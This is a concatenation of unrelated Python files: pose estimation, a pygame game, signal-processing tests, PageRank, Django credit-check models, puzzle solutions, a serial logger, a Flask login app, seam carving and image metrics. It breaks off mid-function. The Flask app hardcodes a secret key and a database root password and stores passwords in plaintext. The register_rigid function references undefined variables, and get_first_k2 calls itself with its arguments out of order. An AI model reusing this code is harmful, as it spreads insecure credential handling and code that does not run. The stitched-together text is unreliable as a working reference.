new_pt = np.dot(t,new_pt)
return new_pt[0:2]
def mesh_kpts(image_name,verbosity=True, lam=1, tol=1e-10):
'''
take the image name and return the croped image, the image of the heatmap and the meshs of the cad model
:param image_name : the path/name of the image
:param verbosity : print or not some indermediate results
:param lam : usualy 1
:param tol : a little value used in convergence tests
:return : [cropped_image, heatmap, meshs]
'''
# loading the cad model
cad = Model()
cad.load_model()
# loading dict
dict = Template(cad)
# read heatmap and detect maximal responses
heatmap = readHM(image_name, 8)
[W_hp, score] = findWMax(heatmap);
print(W_hp,"\n")
print(score,"\n")
lens_f = 319.4593
lens_f_rescale = lens_f / 640.0 * 64.0
W_hp[0] = W_hp[0] + 15.013 / 640.0 * 64.0
W_hp[1] = W_hp[1] - 64.8108 / 640 * 64.0
W_hp_norm = np.ones([3, len(W_hp[0])])
W_hp_norm[0] = (W_hp[0] - 32.0) / lens_f_rescale
W_hp_norm[1] = (W_hp[1] - 32.0) / lens_f_rescale
# pose estimation weak perspective
opt_wp = PoseFromKpts_WP(W_hp, dict, weight=score, verb=verbosity, lam=lam, tol=tol)
# pose estimation full perspective
opt_fp = PoseFromKpts_FP(W_hp_norm, dict, R0=opt_wp.R, weight=score, verb=verbosity, lam=1, tol=1e-10);
lens_f_cam = lens_f_rescale * 4
K_cam = [[lens_f_cam, 0, 128], [0, lens_f_cam, 128], [0, 0, 1]]
# we use cv2 to read the image to use the cv2 function later
img = cv2.imread(image_name)
# crop image
center = [128, 128]
scale = 1.28
cropImage(img, center, scale)
img_crop = cv2.resize(img, (200, 200)) / 255.0
# weak perspective
S_wp = np.dot(opt_wp.R, opt_wp.S)
S_wp[0] += opt_wp.T[0]
S_wp[1] += opt_wp.T[1]
# full perspective
S_fp = np.dot(opt_fp.R,opt_fp.S)
for i in range(S_fp.shape[0]):
S_fp[i] += opt_fp.T[i]
# computation of the polygon weak perspective
[model_wp, _, _, _] = fullShape(S_wp, cad)
mesh2d_wp = np.transpose(model_wp.vertices[:, 0:2]) * 200 / heatmap.shape[1]
# adding the camera parameters
mesh2d_wp[0] += -15.013 / 3.2
mesh2d_wp[1] += 64.8108 / 3.2
# computation of the polygon full perspective
[model_fp, _, _, _] = fullShape(S_fp, cad)
mesh2d_fp = np.dot(K_cam,np.transpose(model_fp.vertices))
# adding camera parameters
mesh2d_fp[0] /= mesh2d_fp[2]
mesh2d_fp[1] /= mesh2d_fp[2]
mesh2d_fp = transformHG(mesh2d_fp, center, scale, heatmap.shape[0:2], False) * 200 / heatmap.shape[1]
mesh2d_fp[0] += -15.013 / 3.2
mesh2d_fp[1] += 64.8108 / 3.2
# computation of the sum of the heatmap
response = np.sum(heatmap, 2)
max_value = np.amax(response)
min_value = np.amin(response)
response = (response - min_value) / (max_value - min_value)
cmap = plt.get_cmap('jet')
mapIm = np.delete(cv2.resize(cmap(response), (200, 200)), 3, 2)
return [img_crop, mapIm, np.transpose(mesh2d_wp), np.transpose(mesh2d_fp), opt_fp.R, opt_fp.T]
|
__author__ = 'yuvv'
import json
from sys import exit as sys_exit
import plane
import pygame
from pygame.locals import *
# global variables
SCREEN_W, SCREEN_H = 480, 768
# pygame init
pygame.mixer.init()
pygame.init()
screen = pygame.display.set_mode((SCREEN_W, SCREEN_H),
pygame.FULLSCREEN | pygame.DOUBLEBUF)
pygame.display.set_caption('plain!')
# load resource
SOUND_EXPLOSION = pygame.mixer.Sound('res\\sound\\explosion.ogg')
SOUND_SHOOT = pygame.mixer.Sound('res\\sound\\shoot.ogg')
IMG_PLANES = pygame.image.load('res\\img\\plane.png').convert_alpha()
IMG_PLANES_SUB_iNFO = json.load(open('res\\img\\plane.json'))
IMG_BG1 = pygame.image.load('res\\img\\bg_01.jpg').convert()
IMG_BG2 = pygame.image.load('res\\img\\bg_02.jpg').convert()
# TODO: add other images
# control frame speed
clock = pygame.time.Clock()
pygame.time.set_timer(USEREVENT + 1, 500)
player = plane.Plane(IMG_PLANES.subsurface(IMG_PLANES_SUB_iNFO['hero_1']),
(SCREEN_W / 2, SCREEN_H / 2))
self_items = pygame.sprite.Group() # 在当前画面己方的所有对象
enemy_items = pygame.sprite.Group() # 在当前画面敌方的所有对象
# 主消息循环
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys_exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys_exit()
elif event.type == USEREVENT + 1:
# enemy_items = utils.util.create_enemy(enemy_items, 'enemy_s')
# self_items.add(player.shoot(Bullet('bullet_1')))
SOUND_SHOOT.play()
# 设置最大帧率
passed_ms = clock.tick(60)
# 按下方向键时的处理
key_pressed = pygame.key.get_pressed()
d_x, d_y = 0, 0
if key_pressed[K_LEFT]:
d_x = -1
elif key_pressed[K_RIGHT]:
d_x = 1
if key_pressed[K_UP]:
d_y = -1
elif key_pressed[K_DOWN]:
d_y = 1
# 己方画面绘制
screen.blit(IMG_BG1, IMG_BG1.get_rect())
player.update(passed_ms, d_x, d_y, SCREEN_W, SCREEN_H)
screen.blit(player.image, player.rect.pos)
# 击中敌人处理
for my_bullet in self_items:
if my_bullet != player:
enemy_hit_list = pygame.sprite.spritecollide(my_bullet, enemy_items, True, pygame.sprite.collide_mask)
if len(enemy_hit_list):
self_items.remove(my_bullet)
for dead in enemy_hit_list:
# if isinstance(dead, Plane):
# enemy_items.add(utils.util.Explosion(dead.get_pos()))
SOUND_EXPLOSION.play()
enemy_hit_list.clear()
# update display window
pygame.display.update()
|
import math
import unittest
import numpy as np
import numpy.testing as npt
import sigpy.mri.rf as rf
if __name__ == "__main__":
unittest.main()
class TestTrajGrad(unittest.TestCase):
def test_min_gradient(self):
t = np.linspace(0, 1, 1000)
kx = np.sin(2.0 * math.pi * t)
ky = np.cos(2.0 * math.pi * t)
kz = t
k = np.stack((kx, ky, kz), axis=-1)
(g, k, s, t) = rf.min_time_gradient(
k, 0.0, 0.0, gmax=4, smax=15, dt=4e-3, gamma=4.257
)
npt.assert_almost_equal(np.max(t), 0.916, decimal=4)
def test_trap_grad(self):
dt = 4e-6 # s
area = 200 * dt
dgdt = 18000 # g/cm/s
gmax = 2 # g/cm
trap, _ = rf.trap_grad(area, gmax, dgdt, dt)
npt.assert_almost_equal(area, np.sum(trap) * dt, decimal=3)
npt.assert_almost_equal(gmax, np.max(trap), decimal=1)
def test_min_trap_grad(self):
dt = 4e-6 # s
area = 200 * dt
dgdt = 18000 # g/cm/s
gmax = 2 # g/cm
trap, _ = rf.min_trap_grad(area, gmax, dgdt, dt)
npt.assert_almost_equal(area, np.sum(trap) * dt, decimal=3)
npt.assert_almost_equal(gmax, np.max(trap), decimal=1)
|
import numpy as np
import scipy.sparse.linalg as linalg
def get_pagerank(transition_prob_matrix, alpha=0.85):
n = len(transition_prob_matrix)
transition_prob_matrix += np.ones([n,n])*alpha/n
lamb, v = linalg.eigs(transition_prob_matrix, k=1)
P = v[:, 0]
P /= P.sum()
return np.argsort(P)[::-1], P
def get_easy_pagerank(transition_prob_matrix, err_dist=0.0001, alpha=0.85):
n = len(transition_prob_matrix)
transition_prob_matrix += np.ones([n,n])*alpha/n
P = np.array([1/n]*n).reshape(n, 1)
while True:
prev = P.copy()
P = transition_prob_matrix.dot(P)
P /= P.sum()
err = np.abs(P-prev).sum()
if err <= err_dist:
break
transition_prob_matrix = transition_prob_matrix.dot(transition_prob_matrix)
P = np.array(P.T)[0]
return np.argsort(P)[::-1], P
if __name__ == '__main__':
M = np.array([[0, 1, 1. / 2, 0, 1. / 4, 1. / 2, 0],
[1. / 5, 0, 1. / 2, 1. / 3, 0, 0, 0],
[1. / 5, 0, 0, 1. / 3, 1. / 4, 0, 0],
[1. / 5, 0, 0, 0, 1. / 4, 0, 0],
[1. / 5, 0, 0, 1. / 3, 0, 1. / 2, 1],
[0, 0, 0, 0, 1. / 4, 0, 0],
[1. / 5, 0, 0, 0, 0, 0, 0]])
print("get pagerank------------------")
print("Rank | ID | Prob")
r, p = get_pagerank(M, alpha=0)
for i in range(len(r)):
print(f'{i+1} | {r[i]+1} | {p[r[i]]}')
print("get easy pagerank-------------")
print("Rank | ID | Prob")
r, p = get_easy_pagerank(M, alpha=0)
for i in range(len(r)):
print(f'{i+1} | {r[i]+1} | {p[r[i]]}') |
from django.db import models
from datetime import datetime
from applicant import Applicant
from django.conf import settings
class CreditRequest(models.Model):
'''
Represents a REQUEST to run credit one or more times for an applicant.
Belongs to an applicant so that we know which applicant and agreement,
specifically, we actually ran credit for.
'''
applicant = models.ForeignKey(Applicant)
# person_id is used to identify the name/social used to run it.
person_id = models.CharField(max_length=64)
name = models.CharField(max_length=64)
last_4 = models.CharField(max_length=4)
# The social is stored in social_data, encrypted with the social_data_key
# and encoded as base64. The full social is destroyed as soon as it
# is no longer needed.
social_data = models.TextField(null=True, blank=True, default=None)
social_data_key = models.TextField(null=True, blank=True)
# comma separated list of bureaus on which to run the request.
bureaus = models.CharField(max_length=64)
# Stop running bureaus if you get a response that is at least this value.
stop_running_at_beacon = models.IntegerField(null=True, blank=True)
approved_at_beacon = models.IntegerField()
# When and where this was run.
insert_date = models.DateTimeField(auto_now_add=True)
processed_date = models.DateTimeField(blank=True, null=True)
modified_date = models.DateTimeField(auto_now=True, auto_now_add=True)
processor_pid = models.IntegerField(blank=True, null=True)
processed = models.BooleanField(default=False)
error = models.BooleanField(default=False)
# need to store these things
first_name = models.CharField(max_length=64)
last_name = models.CharField(max_length=64)
address = models.CharField(max_length=80)
city = models.CharField(max_length=50)
state = models.CharField(max_length=25)
zipcode = models.CharField(max_length=10)
country_code = models.CharField(max_length=10)
@staticmethod
def create_request(applicant):
req = CreditRequest()
req.applicant = applicant
agreement = applicant.agreement
system_address = agreement.system_address
# we need this person's SYSTEM address to run their credit
req.address = ' '.join([system_address.street1, system_address.street2])
req.city = system_address.city
req.state = system_address.state
req.zipcode = system_address.zip
req.country_code =system_address.country
# obtain their name
req.first_name = applicant.first_name
req.last_name = applicant.last_name
req.last_4 = applicant.last_4
req.name = ' '.join(filter(None, [applicant.first_name, applicant.last_name]))
# call out to generate_person_id
req.person_id = applicant.person_id
req.social_data, req.social_data_key = applicant.social_data, applicant.social_data_key
# encrypt social data
#req.social_data, req.social_data_key = settings.SOCIAL_CIPHER.encrypt_long_encoded(social)
# credit settings
req.bureaus = settings.CREDIT_BUREAUS
req.approved_at_beacon = settings.CREDIT_APPROVED_BEACON
req.stop_running_at_beacon = settings.STOP_RUNNING_AT_BEACON
# save and return
req.save()
return req
class Meta:
verbose_name = "Credit Request"
app_label = 'agreement'
class CreditFile(models.Model):
'''
Represents the results of a CreditRequest. These belong to an applicant,
but may be duplicated onto another applicant if one exists within the
correct timeframe, skipping the CreditRequest step.
'''
# A given applicant should always have its own credit files.
# It may have one per bureau? We need to look at this.
# Credit files are not reused or shared among applicants. They'll be
# copied instead, by using the person_id ( below)
applicant = models.ForeignKey(Applicant, related_name='credit_file')
# person_id is used to identify the name/social used to run it.
person_id = models.CharField(max_length=128)
name = models.CharField(max_length=64)
last_4 = models.IntegerField()
# Then, a new file can be created by COPYING this one if the person_id
# matches.
copy_of_file = models.ForeignKey('self', null=True, blank=True, related_name='files')
# The CreditRequest that generated this credit file, or null if it was a copy.
# (We can always find it from copy_of_file, and storing a null prevents
# duplicates from showing in the run's .files list.)
run_request = models.ForeignKey('CreditRequest', null=True, blank=True)
# The time that this file was generated.
generated_date = models.DateTimeField()
# The result information.
bureau = models.CharField(max_length=20)
beacon = models.IntegerField(null=True, blank=True)
fraud = models.BooleanField(default=False)
frozen = models.BooleanField(default=False)
nohit = models.BooleanField(default=False)
vermont = models.BooleanField(default=False)
status_string = models.CharField(max_length=20)
# bookkeeping
transaction_id = models.CharField(max_length=64)
transaction_status = models.CharField(max_length=20)
# address
address = models.CharField(max_length=80)
city = models.CharField(max_length=50)
state = models.CharField(max_length=25)
zipcode = models.CharField(max_length=10)
country_code = models.CharField(max_length=10)
def __unicode__(self):
return "CreditFile(name=%r, bureau=%r, beacon=%r, status_string=%r)" % (
self.name, self.bureau, self.beacon, self.status_string)
def as_jsonable(self):
jsonable = {
field: getattr(self, field)
for field in ('name', 'bureau', 'fraud', 'frozen', 'nohit', 'vermont', 'beacon', 'generated_date', 'status_string')
}
return jsonable
#@property
#def another_status_string(self):
# if self.fraud or self.frozen or self.vermont:
# return 'REVIEW'
# if self.nohit:
# return 'NO HIT'
# if self.beacon >= settings.CREDIT_APPROVED_BEACON:
# return 'APPROVED'
# return 'DCS'
class Meta:
verbose_name = "Credit File"
app_label = 'agreement' |
from nummath import isPrime,primesWithin
brange = primesWithin(1000)
nmax = 0
amax = 0
bmax = 0
for b in primesWithin(1000):
for a in range(-1000,1001):
n = 0
while(isPrime(n**2 + a*n + b)):
n = n+1
if n>nmax:
amax = a
bmax = b
nmax = n
print(amax*bmax)
|
#import sys
#input = sys.stdin.readline
def main():
N = 10
CAA, CAB, CBA, CBB = list(input())
S = set(["AB"])
for i in range(2,N):
T = set()
for s in S:
for j in range(i-1):
if s[j] == "A" and s[j+1] == "A":
T.add(s[:j+1] + CAA + s[j+1:])
elif s[j] == "A" and s[j+1] == "B":
T.add(s[:j+1] + CAB + s[j+1:])
elif s[j] == "B" and s[j+1] == "A":
T.add(s[:j+1] + CBA + s[j+1:])
else:
T.add(s[:j+1] + CBB + s[j+1:])
S = T
print(i+1, len(S), S)
if __name__ == '__main__':
main()
|
import serial
from time import gmtime, strftime
import time
import sys
import os
#----------------------------------------------------------------
port = input("COM-Port: ")
w = 1
while w:
try:
ser = serial.Serial("Com" + port,19200,timeout=0)
w = 0
except:
print("Fehler bei Verbindung!")
port = input("COM-Port: ")
w = 1
#----------------------------------------------------------------
try:
pfad = os.path.abspath(".") + "\DATA\\"
if not os.path.isdir(pfad):
os.mkdir(pfad)
except:
a = input("Fehler beim Zugriff auf Pfad")
sys.exit()
titel = input("Titel der Messreihe: ")
w = 1
while w:
try:
fobj_out = open(pfad + titel + ".csv","a")
fobj_out.write("LOG\n")
fobj_out.close()
print("Log wird gespeicher unter: \n" + pfad + titel + ".csv")
w = 0
except:
print("Fehler beim Zugriff auf Datei")
titel = input("Anderer Dateiname: ")
w = 1
#----------------------------------------------------------------
intervall = input("Intervall: ")
#----------------------------------------------------------------
print("Beginn der Messung: " + time.strftime("%d.%m.%Y um %H:%M:%S Uhr"))
z = 0
#----------------------------------------------------------------
while 1:
sys.stdout.flush()
time.sleep(float(intervall))
while ser.inWaiting() > 0:
x = ser.read()
z = z + 1
fobj_out = open(pfad + titel + ".csv","a")
fobj_out.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ";" + str(z) + '\n')
fobj_out.close()
z = 0
|
class Solution(object):
def letterCasePermutation(self, S):
"""
:type S: str
:rtype: List[str]
"""
res = [""]
S = S.lower()
for i in S:
if not i in '1234567890':
res = [c + i for c in res] + [c + i.upper() for c in res]
else:
res = [c + i for c in res]
return res |
def get_first_k(arr, length, start, end, k):
if start == 0 and arr[start] == k:
return 0
if start == end:
if arr[start] == k:
return start
else:
return -1
mid = (end + start) // 2
if arr[mid] == k and arr[mid - 1] != k:
return mid
if k <= arr[mid]:
return get_first_k(arr, length, start, mid - 1, k)
else:
return get_first_k(arr, length, mid + 1, end, k)
def get_last_k(arr, length, start, end, k):
if end == length - 1 and arr[end] == k:
return end
if start == end:
if arr[end] == k:
return end
else:
return -1
mid = (end + start) // 2
if arr[mid] == k and arr[mid + 1] != k:
return mid
if arr[mid] <= k:
return get_last_k(arr, length, mid + 1, end, k)
else:
return get_last_k(arr, length, start, mid - 1, k)
def solution(arr, k):
length = len(arr)
number = 0
if length > 0:
first = get_first_k(arr, length, 0, length - 1, k)
last = get_last_k(arr, length, 0, length - 1, k)
if first > -1 and last > -1:
number = last - first + 1
return number
def get_first_k2(arr, length, start, end, k):
if start > end:
return -1
mid = (start + end) // 2
mid_data = arr[mid]
if mid_data == k:
if (mid > 0 and arr[mid - 1] != k) or mid == 0:
return mid
else:
end = mid - 1
elif mid_data > k:
end = mid - 1
else:
start = mid + 1
return get_first_k2(arr, length, k, start, end)
a_list = [1, 2, 3, 3, 3, 3, 4, 5]
print(solution(a_list, 3))
|
from flask import Flask, render_template, redirect, request
from flask.ext.login import LoginManager, login_required, login_user, logout_user, UserMixin, current_user
from werkzeug.security import generate_password_hash, check_password_hash
from models.all import db, Person
from lib import *
app = Flask(__name__)
db.init_app(app)
app.debug = True
login_manager = LoginManager()
app.secret_key = "bananafaceankle"
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:banana@localhost:3306/buuf_re'
class User(UserMixin):
def __init__(self, person, userid, name):
self.person = person
self.id = userid
self.name = name
@staticmethod
def get(userid):
person = Person.query.filter_by(username=userid).first()
if person is None:
return None
return User(person, person.username, person.name)
def verify_pass(username, password):
user = db.session.query(Person).filter(Person.username == username).first()
if user.password == password:
print 'password match'
return True
else:
print 'password fail'
return False
@app.route('/')
def base():
try:
print current_user
if current_user.get_id() is not None:
print 'going home'
return render_template("home.html")
else:
print 'please log in'
return redirect("/login/")
except Exception as e:
print 'BAD!!!!!!!'
print e
login_manager.init_app(app)
login_manager.login_view = "login"
@app.route('/home/')
@login_required
def home():
print 'home'
return render_template("home.html")
@login_manager.user_loader
def load_user(userid):
print 'load user'
return User.get(userid)
@app.route("/logout/")
@login_required
def logout():
print 'logout'
logout_user()
return redirect("/home/")
@app.route('/login/', methods=['GET', 'POST'])
def login():
print 'login'
print request.method
if request.method == "POST":
username = request.form['user']
user = User.get(username)
if user and verify_pass(username, request.form['pass']):
print 'good credentials'
login_user(user)
return render_template("home.html")
else:
print 'bad credentials'
return render_template("login.html", errors=["bad credentials"])
print 'what'
return render_template("login.html", error=None)
@app.route('/register/', methods=['GET', 'POST'])
def register():
print 'register'
print request.method
if request.method == "POST":
if request.form['pass1'] == request.form['pass2']:
print 'passwords match'
person = Person(
name=request.form['name'],
email=request.form['email'],
username=request.form['username'],
password=request.form['pass1']
)
dbadd(person)
return render_template("login.html", messages=['Registration successful.'])
else:
print 'passwords different'
return render_template("register.html", error=['Passwords don\'t match'])
print "what"
return render_template("register.html")
if __name__ == '__main__':
app.run()
|
from skimage import io
from matplotlib import pyplot as plt
import random
import sc
import network_energy
import forward_conv_energy
import forward_energy
import part1_energy
import combined_energy
image_dir = "smallcar.jpg"
# sb: 500*375 c*r
# cat: 360*263
# cute cat: 333*220 c*r
# timg: 325*186
#
cuts = 20
# seam carve and show result
img = io.imread(image_dir)
def draw_seam(seam):
L = len(seam)
xs = [seam[i][1] for i in range(L)]
ys = [seam[i][0] for i in range(L)]
plt.plot(xs, ys, '--')
def determine_directions(dr, dc):
dirs = ['vertical']*dc + ['horizontal']*dr
random.shuffle(dirs)
return dirs
def compare_resize(ori, func, forward, cut_r, cut_c, name, func2, forward2, name2, filename):
r, c = ori.shape[0], ori.shape[1]
out_r = r + cut_r
out_c = c + cut_c
"""
img = ori
dirs = sc.determine_directions(img, func, forward, out_r, out_c)
carved_seams = []
cnt = 0
len_d = len(dirs)
for d in dirs:
#em = func(img)
print("process {}/{}".format(cnt, len_d))
cnt += 1
img, tmp_seams = sc.carve(img, func, forward, d, num=1, border=1, need_seam=True)
carved_seams += tmp_seams
seams = sc.transform_seams(carved_seams)
"""
#img = sc.resize_once(ori, func, forward, out_r, out_c)
img = sc.resize_multi(ori, func, forward, out_r, out_c)
img2 = sc.resize_multi(ori, func2, forward2, out_r, out_c)
plt.figure()
plt.subplot(121)
plt.title(name)
plt.imshow(img)
#for seam in seams:
# draw_seam(seam.coor)
plt.subplot(122)
plt.title(name2)
plt.imshow(img2)
plt.savefig(filename)
#for seam in carved2:
# draw_seam(seam.coor)
def compare_resize_3(ori, func1, forward1, cut_r, cut_c, name1, func2, forward2, name2, func3, forward3, name3, filename):
r, c = ori.shape[0], ori.shape[1]
out_r = r + cut_r
out_c = c + cut_c
img1 = sc.resize_multi(ori, func1, forward1, out_r, out_c)
img2 = sc.resize_multi(ori, func2, forward2, out_r, out_c)
img3 = sc.resize_multi(ori, func3, forward3, out_r, out_c)
plt.figure()
plt.subplot(131)
plt.title(name1)
plt.imshow(img1)
#for seam in seams:
# draw_seam(seam.coor)
plt.subplot(132)
plt.title(name2)
plt.imshow(img2)
plt.subplot(133)
plt.title(name3)
plt.imshow(img3)
plt.savefig(filename)
#for seam in carved2:
# draw_seam(seam.coor)
def try_resize(ori, func, forward, cut_r, cut_c, name, filename):
r, c = ori.shape[0], ori.shape[1]
out_r = r + cut_r
out_c = c + cut_c
img = sc.resize_multi(ori, func, forward, out_r, out_c)
plt.figure()
plt.subplot(121)
plt.title("original")
plt.imshow(ori)
#for seam in seams:
# draw_seam(seam.coor)
plt.subplot(122)
plt.title(name+" result")
plt.imshow(img)
plt.savefig(filename)
#for seam in carved2:
# draw_seam(seam.coor)
#try_resize(img, forward_conv_energy.energy_map, True, -15, -55, "cut:forward")
#try_resize(img, part1_energy.combine, False, +10, +20, "enlarge:RGB+entropy")
#try_resize(img, network_energy.energy_map, False, 0, 150, "network", '3 150 network')
#compare_resize(img, network_energy.energy_map, False, 0, 100, "network",
# network_energy.tail_map, False, "tail", "3 100 network vs tail")
#compare_resize(img, part1_energy.combine, False, 0, 150, "RGB+entropy",
# forward_conv_energy.energy_map, True, " forward", "3 150 RGB_entopy vs forward")
#compare_resize_3(img, part1_energy.combine, False, -50, 60, "RGB+entropy",
# network_energy.tail_map, False, "tail",
# combined_energy.part1_tail, False, "combined", "cutecat -+ RGB tail combined")
def test():
img = io.imread('dolphin.jpg')
RGB = part1_energy.RGBdifference(img)
H = part1_energy.minus_entropy(img)
RGBH = part1_energy.combine(img)
N = network_energy.energy_map(img)
plt.figure()
plt.subplot(221)
plt.title("RGB energy map")
plt.imshow(RGB)
plt.subplot(222)
plt.title("entropy energy map")
plt.imshow(H)
plt.subplot(223)
plt.title("RGBH energy map")
plt.imshow(RGBH)
plt.subplot(224)
plt.title("NETWORK energy map")
plt.imshow(N)
plt.savefig("energy_map_compare")
plt.show()
#H = combine(img, show=True)
#plt.imshow(H)
#plt.show()
#test()
plt.figure()
plt.title('Original Image')
plt.imshow(img)
plt.savefig('smallcar_origin')
plt.show()
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.urls import include
urlpatterns = [
url(r'^kg_django/', include('kg_django.urls', namespace='kg_django'))
] |
# library path
import os, sys
# lib_path = os.path.abspath(
# '/vol/biomedic/users/aa16914/software/SimpleITK/SimpleITK-build/SimpleITK-build/Wrapping/Python/')
# sys.path.insert(1, lib_path)
import SimpleITK as sitk
import numpy as np
import math as mt
# ssim
from scipy.ndimage import uniform_filter, gaussian_filter
from numpy.lib.arraypad import _validate_lengths
# multi-processing
import multiprocessing
num_cores = multiprocessing.cpu_count()
###############################################################
# dtype_range = {np.bool_: (False, True),
# np.bool8: (False, True),
# np.uint8: (0, 255),
# np.uint16: (0, 65535),
# np.uint32: (0, 2**32 - 1),
# np.uint64: (0, 2**64 - 1),
# np.int8: (-128, 127),
# np.int16: (-32768, 32767),
# np.int32: (-2**31, 2**31 - 1),
# np.int64: (-2**63, 2**63 - 1),
# np.float16: (-1, 1),
# np.float32: (-1, 1),
# np.float64: (-1, 1)}
#
###############################################################
def _as_floats(im1, im2):
"""Promote im1, im2 to nearest appropriate floating point precision."""
float_type = np.result_type(im1.dtype, im2.dtype, np.float32)
if im1.dtype != float_type:
im1 = im1.astype(float_type)
if im2.dtype != float_type:
im2 = im2.astype(float_type)
return im1, im2
###############################################################
def crop(ar, crop_width, copy=False, order='K'):
"""Crop array `ar` by `crop_width` along each dimension.
Parameters
----------
ar : array-like of rank N
Input array.
crop_width : {sequence, int}
Number of values to remove from the edges of each axis.
``((before_1, after_1),`` ... ``(before_N, after_N))`` specifies
unique crop widths at the start and end of each axis.
``((before, after),)`` specifies a fixed start and end crop
for every axis.
``(n,)`` or ``n`` for integer ``n`` is a shortcut for
before = after = ``n`` for all axes.
copy : bool, optional
If `True`, ensure the returned array is a contiguous copy. Normally,
a crop operation will return a discontiguous view of the underlying
input array.
order : {'C', 'F', 'A', 'K'}, optional
If ``copy==True``, control the memory layout of the copy. See
``np.copy``.
Returns
-------
cropped : array
The cropped array. If ``copy=False`` (default), this is a sliced
view of the input array.
"""
ar = np.array(ar, copy=False)
crops = _validate_lengths(ar, crop_width)
slices = [slice(a, ar.shape[i] - b) for i, (a, b) in enumerate(crops)]
if copy:
cropped = np.array(ar[slices], order=order, copy=True)
else:
cropped = ar[slices]
return cropped
###############################################################
def register(moving_image, fixed_image):
"""Resample the target image to the reference image.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
resampled : sitk
the resampled target image
"""
transfromDomainMeshSize = [10] * moving_image.GetDimension()
tx = sitk.BSplineTransformInitializer(fixed_image,
transfromDomainMeshSize)
R = sitk.ImageRegistrationMethod()
R.SetMetricAsMattesMutualInformation(50)
R.SetOptimizerAsGradientDescentLineSearch(5.0, 100,
convergenceMinimumValue=1e-4,
convergenceWindowSize=5)
R.SetOptimizerScalesFromPhysicalShift()
R.SetInitialTransform(tx)
R.SetInterpolator(sitk.sitkLinear)
R.SetShrinkFactorsPerLevel([6, 2, 1])
R.SetSmoothingSigmasPerLevel([6, 2, 1])
R.SetNumberOfThreads(num_cores)
outTx = R.Execute(fixed_image, moving_image)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(fixed_image);
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetDefaultPixelValue(100)
resampler.SetTransform(outTx)
resampler.SetNumberOfThreads(num_cores)
return resampler.Execute(moving_image)
###############################################################
def register_rigid(moving_image, fixed_image):
"""Resample the target image to the reference image.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
resampled : sitk
the resampled target image
"""
numberOfBins = 24
samplingPercentage = 0.10
R = sitk.ImageRegistrationMethod()
R.SetMetricAsMattesMutualInformation(numberOfBins)
R.SetMetricSamplingPercentage(samplingPercentage)
R.SetMetricSamplingStrategy(R.RANDOM)
# -------------------------------------------------------------------------------------------------------------------------------
# dsiplacement
displacementField = sitk.Image(fixed.GetSize(), sitk.sitkVectorFloat64)
displacementField.CopyInformation(fixed)
displacementTx = sitk.DisplacementFieldTransform(displacementField)
del displacementField
displacementTx.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0.0,
varianceForTotalField=1.5)
R.SetMovingInitialTransform(outTx)
R.SetInitialTransform(displacementTx, inPlace=True)
R.SetMetricAsANTSNeighborhoodCorrelation(4)
R.MetricUseFixedImageGradientFilterOff()
R.MetricUseFixedImageGradientFilterOff()
R.SetShrinkFactorsPerLevel([3, 2, 1])
R.SetSmoothingSigmasPerLevel([2, 1, 1])
R.SetOptimizerScalesFromPhysicalShift()
R.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=300,
estimateLearningRate=R.EachIteration)
outTx.AddTransform(R.Execute(fixed, moving))
R.SetOptimizerAsRegularStepGradientDescent(1.0, .001, 200)
R.SetInitialTransform(sitk.TranslationTransform(fixed_image.GetDimension()))
R.SetInterpolator(sitk.sitkLinear)
R.SetNumberOfThreads(num_cores)
outTx = R.Execute(fixed_image, moving_image)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(fixed_image);
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetDefaultPixelValue(0)
resampler.SetTransform(outTx)
resampler.SetNumberOfThreads(num_cores)
return resampler.Execute(moving_image)
###############################################################
def resample(tar_img, ref_img):
"""Resample the target image to the reference image.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
resampled : sitk
the resampled target image
"""
resizeFilter = sitk.ResampleImageFilter()
resizeFilter.SetNumberOfThreads(num_cores)
resizeFilter.SetReferenceImage(ref_img)
return resizeFilter.Execute(tar_img)
###############################################################
def calc_correlation(tar_img, ref_img):
"""Resample the target image to the reference image.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
cross-correlation : float
Cross-correlation of two images
"""
tar_vol = tar_img
ref_vol = ref_img
num = np.sum((tar_vol - tar_vol.mean()) * (ref_vol - ref_vol.mean()))
den = np.sqrt(np.sum(np.square(tar_vol - tar_vol.mean())) * np.sum(np.square(ref_vol - ref_vol.mean())))
return num / den
###############################################################
def calc_mse(tar_img, ref_img):
"""Compute the mean-squared error between two images.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
Returns
-------
mse : float
The mean-squared error (MSE) metric.
"""
tar_vol = tar_img
ref_vol = ref_img
return np.mean(np.square(ref_vol - tar_vol), dtype=np.float64)
###############################################################
def calc_nrmse(tar_img, ref_img, norm_type='Euclidean'):
"""Compute the normalized root mean-squared error (NRMSE) between two images.
Parameters
----------
tar_img : sitk
Test image.
ref_img : sitk
Ground-truth image.
norm_type : {'Euclidean', 'min-max', 'mean'}
Controls the normalization method to use in the denominator of the
NRMSE. There is no standard method of normalization across the
literature [1]_. The methods available here are as follows:
- 'Euclidean' : normalize by the Euclidean norm of ``im_true``.
- 'min-max' : normalize by the intensity range of ``im_true``.
- 'mean' : normalize by the mean of ``im_true``.
Returns
-------
nrmse : float
The NRMSE metric.
References
----------
.. [1] https://en.wikipedia.org/wiki/Root-mean-square_deviation
"""
tar_vol = tar_img
ref_vol = ref_img
norm_type = norm_type.lower()
if norm_type == 'euclidean':
denom = np.sqrt(np.mean((ref_vol * ref_vol), dtype=np.float64))
elif norm_type == 'min-max':
denom = ref_vol.max() - ref_vol.min()
elif norm_type == 'mean':
denom = ref_vol.mean()
else:
raise ValueError("Unsupported norm_type")
return np.sqrt(calc_mse(ref_img, tar_img)) / denom
###############################################################
def calc_psnr(tar_img, ref_img):
